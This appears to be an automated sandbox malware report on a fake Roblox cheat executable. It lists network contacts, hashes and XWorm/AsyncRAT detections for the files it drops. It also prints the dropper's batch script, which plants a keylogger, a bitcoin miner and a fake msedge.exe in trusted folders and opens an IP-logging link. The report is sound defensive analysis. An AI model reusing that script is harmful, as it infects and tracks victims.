                                      http://www.accv.es00RobloxPlayerInstaller.exe, 00000004.00000002.1516960770.0000000004790000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1507618625.0000000004794000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://2no.co/chromecache_71.10.drfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://ecsv2.roblox.com/client/pbecheat_roblox.exe, 00000000.00000003.1323908977.000001A0AAE41000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509730298.000000000255A000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1516172847.000000000255F000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.1329423630.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1509897327.000000000255D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.1511233816.0000000001138000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://2no.co/redirect-2chromecache_71.10.drfalse
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperateRobloxPlayerInstaller.exe, 00000004.00000002.1517491839.00000000047FB000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506111775.00000000047BE000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000003.1506844085.00000000047F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
128.116.21.4 | edge-term4-ams2.roblox.com | United States | 22697 | ROBLOX-PRODUCTIONUS | false
99.86.4.125 | d2v57ias1m20gl.cloudfront.net | United States | 16509 | AMAZON-02US | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
88.212.202.52 | counter.yadro.ru | Russian Federation | 39134 | UNITEDNETRU | false
142.250.181.228 | unknown | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
142.250.184.228 | www.google.com | United States | 15169 | GOOGLEUS | false
104.21.4.208 | cdn.iplogger.org | United States | 13335 | CLOUDFLARENETUS | false
88.212.201.204 | unknown | Russian Federation | 39134 | UNITEDNETRU | false
172.67.149.76 | 2no.co | United States | 13335 | CLOUDFLARENETUS | false
                                      IP
                                      192.168.2.16
                                      192.168.2.9
                                      192.168.2.10
                                      127.0.0.1
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1484385
Start date and time: 2024-07-30 00:48:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 44s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: cheat_roblox.exe
Detection: MAL
Classification: mal56.troj.spyw.evad.winEXE@24/21@20/14
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 199.232.214.172, 142.250.185.195, 142.250.186.78, 74.125.133.84, 34.104.35.123, 192.229.221.95, 142.250.186.131, 142.250.74.206
• Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: cheat_roblox.exe
Time | Type | Description
18:49:02 | API Interceptor | 4x Sleep call for process: RobloxPlayerInstaller.exe modified
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://www.kjecom.com/serviciodecorreo/login/Get hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://pub-1dce8f5133cd41708dc3ec7e6864bb58.r2.dev/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://s.id/helpcenter84619Get hashmaliciousHTMLPhisherBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
                                                                                                        http://matmcst.gitbook.io/usGet hashmaliciousUnknownBrowse
                                                                                                        • 40.127.169.103
                                                                                                        • 184.28.90.27
                                                                                                        • 20.3.187.198
                                                                                                        • 52.165.165.26
                                                                                                        • 20.114.59.183
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\Keyloger.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe | roblox cheat.exe | malicious | XWorm
C:\Users\user\AppData\Local\Temp\ msedge.exe | roblox cheat.exe | malicious | XWorm
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):3804
                                                                                                                Entropy (8bit):5.339616712647284
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:DD/yZdviDSGAkir0ClZvKH3F1gZ6ubDgZ6ubzsgZ6ubrvKLYZJFcUDK4z/8Y5Uye:fAd8b8ov8URnrhnPJYIJEJZJqGOvbJA5
                                                                                                                MD5:DA6067E28A5CFDC0C1EB82265109B8D3
                                                                                                                SHA1:9DB81A7E5BF5FDD1EFD8222B1F84F643575478AD
                                                                                                                SHA-256:464DC28CDEB713760C93571ED60887F23676320E1425B9F569A751D35E477BD7
                                                                                                                SHA-512:2E3BE9007099E79E0DA78C4D86ABAA7AD36E110D3841F0A36C48B222965BF4036197F155DB8FCD8D49162AE8EC5617FE3FA849D715BD96005C517E67112A3627
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:2024-07-29T22:49:00.013Z..2024-07-29T22:49:00.223Z,0.223897,1e70,6,Info [FLog::DesktopInstaller] The installer reporter is initialized..2024-07-29T22:49:00.223Z,0.223981,1e70,6,Info [FLog::DesktopInstaller] Reporting Installer Start..2024-07-29T22:49:01.233Z,1.233822,1ee4,6,Info [FLog::DesktopInstaller] Start the Installer thread..2024-07-29T22:49:01.262Z,1.262174,1ee4,6,Info [FLog::DesktopInstaller] The installer will run InstallNormal..2024-07-29T22:49:01.262Z,1.262262,1ee4,6,Info [FLog::DesktopInstaller] Fetch flag info..2024-07-29T22:49:02.081Z,2.081721,1edc,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, body: ..2024-07-29T22:49:31.667Z,31.667459,1edc,6,Critical [FLog::DesktopInstaller] failed Http GET url: https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper, code: 11, message: HttpError: TlsVerificationFail, b
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe
                                                                                                                File Type:Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):233235
                                                                                                                Entropy (8bit):6.025218023713329
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:OhGvwW6Jj7ITWYv0yoVH283rz9WqIAsjjg4DsUQS88UP4TFf3xVOVkCC554jMN/C:M5W+j8chWf8xyvp5iIzB4CNxza/MK
                                                                                                                MD5:0194EB945475F93844C0FAE769C0FA0B
                                                                                                                SHA1:D72876A801C702348EA5B4B4A333C484F2A721FD
                                                                                                                SHA-256:A6BC06B8255E4AFE2EEFF34684605D04DF9EC246FC201BF5E44137987189A0D3
                                                                                                                SHA-512:72A00FE6B9111CAB22F1F424F815A617BE2041A3857A6265B004CA1BFD10F345CA33369CD43009B483F9436CCBCD69C70F7033A85D94527B1F39846B75B43C17
                                                                                                                Malicious:false
                                                                                                                Reputation:low
                                                                                                                Preview:##..## Bundle of CA Root Certificates..##..## Certificate data from Mozilla as of: Mon Mar 11 15:25:27 2024 GMT..##..## This is a bundle of X.509 certificates of public Certificate Authorities..## (CA). These were automatically extracted from Mozilla's root certificates..## file (certdata.txt). This file can be found in the mozilla source tree:..## https://hg.mozilla.org/releases/mozilla-release/raw-file/default/security/nss/lib/ckfw/builtins/certdata.txt..##..## It contains the certificates in PEM format and therefore..## can be directly used with curl / libcurl / php_curl, or with..## an Apache+mod_ssl webserver for SSL client authentication...## Just configure this file as the SSLCACertificateFile...##..## Conversion done with mk-ca-bundle.pl version 1.29...## SHA256: 4d96bd539f4719e9ace493757afbe4a23ee8579de1c97fbebc50bba3c12e8c1e..##......GlobalSign Root CA..==================..-----BEGIN CERTIFICATE-----..MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkGA1UEBhMCQk
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):166912
                                                                                                                Entropy (8bit):6.251413929646261
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:TmnOFd9UhOMQRUGKXs+S++7KFSbxeY+qDDrMK:3d9YGqStKEbxI
                                                                                                                MD5:D653AEF66E218FB009B43365919BBCE3
                                                                                                                SHA1:D38CAFCD950B901EE79FF72EBB87FEC8B2D9582A
                                                                                                                SHA-256:E85AF6A36635490B2FC2793B50C7EBC841DA95BC202A5FC9E7A4DBB17F172A2B
                                                                                                                SHA-512:FF4776B44ACD815251908B7D726980FA9DE5E02AED32026C5A72B64A7B0A464399BE730EE37473FDE3406AE7D7D43284018ADE4D32FC160F579764344DA06EF6
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\ msedge.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Reputation:low
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):140288
                                                                                                                Entropy (8bit):5.566968845764678
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:6mnOFd9U8OM+fe295liNgTddwY0JwsR4TbswYqkX5bEdGDOjESHhddJWjjY/ffIo:Wd9UH95D
                                                                                                                MD5:3AFF3B824FC5BCD05EF4D8EEE176E443
                                                                                                                SHA1:422883493E21D605CB47CC08FD48CAEAD73F414C
                                                                                                                SHA-256:79750B0F34A49A75406A0D7D6949AFD83DF2B2FF946E35A94AEA6BFE1D399599
                                                                                                                SHA-512:126818953B72233B2B0C50523ACE1EA8D1004F80EEDD0414A4FD3E4E385A3CB1D29E3D9BF7B50FA28AE5CC8EF2BF543D6416531F05FB977A79E60E51A82B03AE
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):168960
                                                                                                                Entropy (8bit):5.30703099621005
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3072:PV8w386j+bSL1OGtLJBz65/M6If+3Js+3JFkKeTnY:PN6bsrxBt25
                                                                                                                MD5:520E97797B27B752130B3E982953CEAF
                                                                                                                SHA1:AB460DA7E69D43747D98A4F45F5BB09D0E971789
                                                                                                                SHA-256:8BC3BD8F0FF442D3C83DA8ED7DE13C8E44D095823E2480465BE866C08F7E8700
                                                                                                                SHA-512:3219E4FE6B23411B48930FCE21DA24C8CE9BB07C6B069FA38B26B32DCC102C668F32AE816BD526CFBB44480F8279586509EBB11E9B75138A1F59AE771AA53664
                                                                                                                Malicious:true
                                                                                                                Yara Hits:
                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Keyloger.exe, Author: ditekSHen
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):5720984
                                                                                                                Entropy (8bit):6.362394353465928
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:98304:v7v3kcOmmcMxGf3Yi4bg38mky2aB173qgDDzGxSP8R7fTA7pksuq7:70cB3djgmggDaRXAtHB
                                                                                                                MD5:27469372591B14FF1C57654FACB5E020
                                                                                                                SHA1:492C166CD0E6C8D122CA4687659BF047CD48AFD7
                                                                                                                SHA-256:3B8FCD52686095049B1563FBB6BA0BF73113A01B13C303BEBCB36D8339A1519F
                                                                                                                SHA-512:0CFA845DE57ACF6F17F295F0771C2A61CD846EFDEE79DA012DEF474BCAA91D9E99D3D528CF5698E6112A310C4F97E98AE74B6CFC601B2988C51E92270EBF92A2
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: roblox cheat.exe, Detection: malicious, Browse
                                                                                                                Process:C:\Users\user\Desktop\cheat_roblox.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):477
                                                                                                                Entropy (8bit):5.082252715861135
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Z0DtzHGtzs22yZOVqZwGJbShOVqZwGJbKy5i1bhH0HR:ZMz0zsBiO4Z+O4ZOKoQR
                                                                                                                MD5:AAA81C149A8D65AC899AF053ECF582BC
                                                                                                                SHA1:A784DDE9304A2B8108180A652C9374BEF71500D9
                                                                                                                SHA-256:98818D1694AE946A32DEC4CAEA1FDD219650EF5A915CCA6A68E974C028A2FD69
                                                                                                                SHA-512:74B6B9A1EF22CE12E3CE5076C8A3B6D0BE1C52642C6E004D52255D23AFD3506496D84049CDF6F5E37F5238C5645E014E26D88046D196CDBD3DDA90B3A27BEA92
                                                                                                                Malicious:false
                                                                                                                Preview:%echo off..copy %temp%\msedge.exe %systemDrive%\Program Files (x86)\Microsoft\Edge\Application..start %systemDrive%\Program Files (x86)\Microsoft\Edge\Application\msedge.exe..copy %temp%\BitCoin_miner.exe %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6..start %userprofile%\AppData\Local\Roblox\Versions\version-2e10d35f26294ab6\BitCoin_miner..copy %temp%\Keyloger.exe %systemDrive%..start %systemDrive%\Keyloger.exe..start cmd..start https://2no.co/24RXx6
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2673
                                                                                                                Entropy (8bit):3.9826015805540664
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8SdkTATJHdidAKZdA1P4ehwiZUklqehly+3:8tMpOuy
                                                                                                                MD5:304C6D1B9386DAF0ED27A4EFEDB4CBFA
                                                                                                                SHA1:78ACC09398F543C4B3716D516B364FBE34825750
                                                                                                                SHA-256:C263E9DA6A9AE7211FCD410FD5C1A19DACBB57FAB7FB9A0BB78999ECF59359F1
                                                                                                                SHA-512:C9C7D2AC1486F56F27860B27CD1BDA896E1826CA80FECC37CBE37C5726E1A30B4B485CF1D294276BC47C74E24749ADDA71139D410B81003D6C99084A763EFFDD
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2675
                                                                                                                Entropy (8bit):4.002926419055548
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8sdkTATJHdidAKZdA1+4eh/iZUkAQkqehey+2:8HMYF9Qzy
                                                                                                                MD5:807736E84BD125C0CCD8CB661C1421D5
                                                                                                                SHA1:0116A9FB28ECEA71B976A23BB6CE4E46DEDC16AB
                                                                                                                SHA-256:1592ACF0ED8B361D9311FC6F462EAF77948134416DA678E3BF02677D03338214
                                                                                                                SHA-512:7101F510D7DDEB2F2F4BDBBB8B506F87128D15E472BB2189EDEB63231C1C184D2DA94951DA23BA7BDCD88247E10AF92F70C44D8E7C4E10F8027E753DF0465DD7
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 07:56:51 2023, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2689
                                                                                                                Entropy (8bit):4.007439343876962
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:80dkTAVHdidAKZdA1404eh7sFiZUkmgqeh7sEy+BX:8/M9Inay
                                                                                                                MD5:2DE298A8CE771484E06D3DE5AD616006
                                                                                                                SHA1:1EFF5F5D05156CDB5DAFD766A7436A3AD1D27DBD
                                                                                                                SHA-256:D1A45E76357AC7F74F6C23308A031293363982FF4804BFDFF9D4ED100F176D92
                                                                                                                SHA-512:EE95AAFEC126DE73F07AFFD411359CEA4431B06C6565B40AB5B0FA892AA3A7E61E613B2B7650A9FA55F728BE8BE2920118FFBC49B47B923A40497F3D8B63A544
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.996761702525746
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8djdkTATJHdidAKZdA1p4ehDiZUkwqehyy+R:8AMv5cy
                                                                                                                MD5:7C5DA5717DED558B4F10700B3C904C7F
                                                                                                                SHA1:3CA906EAC9904F38AC07D55BFDF681C26509D457
                                                                                                                SHA-256:5EE66C2224F6CB435BE1C6066E2B09B9E9BCE01CF3D7477EC01462E3724C550E
                                                                                                                SHA-512:0AFBFE28E51808B7DC6B9C9582F18C311732ED46361EE17C8A68F8802401F47094203F1B08A1F8965B04D917A73A5D241C9709862561F467212D65A18D5AF4FD
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2677
                                                                                                                Entropy (8bit):3.988930153255884
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8jdkTATJHdidAKZdA1X4ehBiZUk1W1qehAy+C:8iMxb9gy
                                                                                                                MD5:AF1AF861E75CD5E02E62B3FF20B24399
                                                                                                                SHA1:F82355F261CC419C8AD1EB9E4E858BEF9E09C7F5
                                                                                                                SHA-256:B9BE0A6E557EA562FBEEEB830BE5F31F3DB11ED2239414F2A81DFFABFE5ECA3C
                                                                                                                SHA-512:7BF57AEE59E3C98B2F34787AA93E6EEBE2A195C7641BCE91E542E004327D8DA24B6E14626D6EDEBA2FB9EDC911C12E7FA4C65403681211845D69DF0B640E20E9
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 21:49:15 2024, atime=Wed Sep 27 08:36:55 2023, length=1210144, window=hide
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2679
                                                                                                                Entropy (8bit):3.998977678358186
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:8xdkTATJHdidAKZdA1duTc4ehOuTbbiZUk5OjqehOuTbay+yT+:8wMyTcJTbxWOvTbay7T
                                                                                                                MD5:1F1D1E587DA66F30FFCB5C70637F03EE
                                                                                                                SHA1:0FDD4DFEB25F605CC16F305479D9D593AB7701A6
                                                                                                                SHA-256:78C2B35F8BE8C50C3073892D4093CE1F4D65550AF7665B9B01C5651E18E4E8EC
                                                                                                                SHA-512:C59A5C002FF90D9FA7F9B8ADB835115911F5D19F1BE982C64DD623DA2D84A2328C5287857916C3CF68663FD3B0A8F8EAE90A4D8D5DCBAB1C21118EC5D869B7EF
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):2833
                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                Malicious:false
                                                                                                                URL:https://cdn.iplogger.org/favicon.ico
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2833
                                                                                                                Entropy (8bit):7.876846206921263
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
                                                                                                                MD5:18C023BC439B446F91BF942270882422
                                                                                                                SHA1:768D59E3085976DBA252232A65A4AF562675F782
                                                                                                                SHA-256:E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
                                                                                                                SHA-512:A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
                                                                                                                Malicious:false
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460), with CRLF, CR, LF line terminators
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):9909
                                                                                                                Entropy (8bit):5.405067042408774
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:192:DLlw+00cv13xV1cSHYu+zogDCIIhWp6psOsW4rqSxVEGV5R2WxSi1yz:D5w+Pcv13T1FH0fuIIm6QXxVP20u
                                                                                                                MD5:973A7FCA114110C1817ACA6D5B7CD16E
                                                                                                                SHA1:8ED382EAF809679D595A656547889BA7CAEB6BBA
                                                                                                                SHA-256:4BE9B1FFA53ACDAAB23D678B783DA03465206477BBF4B362B3996E9A8D220B04
                                                                                                                SHA-512:10F3D38E3F85B565A12EAC3B4783476781B4184FE7FF4D8680058FE1ABC647ED3881A3DFBC8FE4F598DCC340084EBD7AA86E7F997DE1AEBDF915B0E88495E7E9
                                                                                                                Malicious:false
                                                                                                                URL:https://2no.co/24RXx6
                                                                                                                Preview:<!DOCTYPE html>.<html lang="US" class="html">.<head>..<title>Branded Short Domain</title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-2024" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="shortener, iplogger, shortlink, url, domain" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="2no.co is a Branded Short Domain..." />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285"
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                                Category:downloaded
                                                                                                                Size (bytes):445
                                                                                                                Entropy (8bit):7.051559084988302
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6:tj+cYUFqb9Oq2EWxiWlb+hKI526WogYAGJe9UCZE12REqtVv6n:tqeqZF3WxiHKI5KopAMQUD10EqtVv6
                                                                                                                MD5:1BD6EB140EC5E09AF54808BCE2BE74BE
                                                                                                                SHA1:00746108650919B88014CE35AABF72B0F20B2046
                                                                                                                SHA-256:3E13369E5C528A4598007330A7D572DADD181E268D0CF87BA7B62FD7668597F8
                                                                                                                SHA-512:FA58EB9D8DB6819BCD39EC73089942D7F16CA602322E3EFA592A3418FB735A87DF9FD5388830F8E1E699CB5457234626F2B09DACEC83E265F300CE19AA907DBE
                                                                                                                Malicious:false
                                                                                                                URL:https://counter.yadro.ru/hit?q;t38.6;r;s1280*1024*24;uhttps%3A//2no.co/redirect-2;hBranded%20Short%20Domain;0.0641046345653069
                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                File Type:GIF image data, version 87a, 31 x 31
                                                                                                                Category:dropped
                                                                                                                Size (bytes):445
